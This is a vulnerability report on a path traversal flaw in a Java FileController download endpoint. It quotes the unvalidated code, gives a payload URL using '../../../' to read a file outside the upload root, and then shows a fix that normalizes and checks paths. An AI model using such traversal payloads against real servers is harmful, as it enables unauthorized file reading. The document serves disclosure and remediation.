1. Code segment (src/main/java/com/java2nb/common/controller/FileController.java):
```java
@RequestMapping(value = "/download")
public void fileDownload(String filePath, String fileName, HttpServletResponse resp) throws Exception {
    // filePath from the request is appended to the upload root without any validation
    String realFilePath = jnConfig.getUploadPath() + filePath;
    InputStream in = new FileInputStream(realFilePath);
    // Set the response header; URL-encode the file name
    fileName = URLEncoder.encode(fileName, "UTF-8");
    resp.setHeader("Content-Disposition", "attachment;filename=" + fileName);
    resp.setContentLength(in.available());
    OutputStream out = resp.getOutputStream();
    byte[] b = new byte[1024];
    int len = 0;
    while ((len = in.read(b)) != -1) {
        out.write(b, 0, len);
    }
    out.flush();
    out.close();
    in.close();
}
```
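2. The endpoint accepts the two parameters filePath and fileName and applies no filtering to either. To test, create a test directory under the C: drive and write 1.txt into it.

3. Payload: http://192.168.56.1/common/sysFile/download?filePath=../../../test/1.txt&fileName=1.txt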
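
One way to close this, shown as an added example that is not the project's own code: resolve `filePath` under the upload root and refuse anything that normalizes outside it. `SafeDownloadPath`, `resolveUnderRoot` and the temporary directory are hypothetical names; `uploadRoot` stands in for `jnConfig.getUploadPath()`.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;

public class SafeDownloadPath {

    // Returns the real path of a regular file inside uploadRoot, or throws.
    static Path resolveUnderRoot(Path uploadRoot, String filePath) throws IOException {
        if (filePath == null || filePath.isEmpty()) {
            throw new SecurityException("empty path");
        }
        Path root = uploadRoot.toRealPath(); // canonical root, symlinks resolved
        Path candidate;
        try {
            // Strip leading separators so the value is always treated as relative,
            // then collapse "." and ".." segments.
            candidate = root.resolve(filePath.replaceFirst("^[/\\\\]+", "")).normalize();
        } catch (InvalidPathException e) {
            throw new SecurityException("malformed path");
        }
        // Path.startsWith compares whole path elements, so a sibling such as
        // "/upload-evil" does not pass for root "/upload".
        if (!candidate.startsWith(root)) {
            throw new SecurityException("path escapes upload root");
        }
        // Re-check after symlink resolution; throws NoSuchFileException if absent.
        Path real = candidate.toRealPath();
        if (!real.startsWith(root) || !Files.isRegularFile(real)) {
            throw new SecurityException("not a regular file under upload root");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample data: a temporary upload root containing one file.
        Path root = Files.createTempDirectory("upload");
        Files.write(root.resolve("ok.txt"), "hello".getBytes("UTF-8"));
        // First value is a normal request; second is the filePath from step 3.
        for (String p : new String[] {"ok.txt", "../../../test/1.txt"}) {
            try {
                System.out.println(p + " -> served from " + resolveUnderRoot(root, p));
            } catch (SecurityException | IOException e) {
                System.out.println(p + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

In the controller, the returned path would replace `realFilePath`, with a rejection mapped to an HTTP 4xx response instead of opening the stream.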
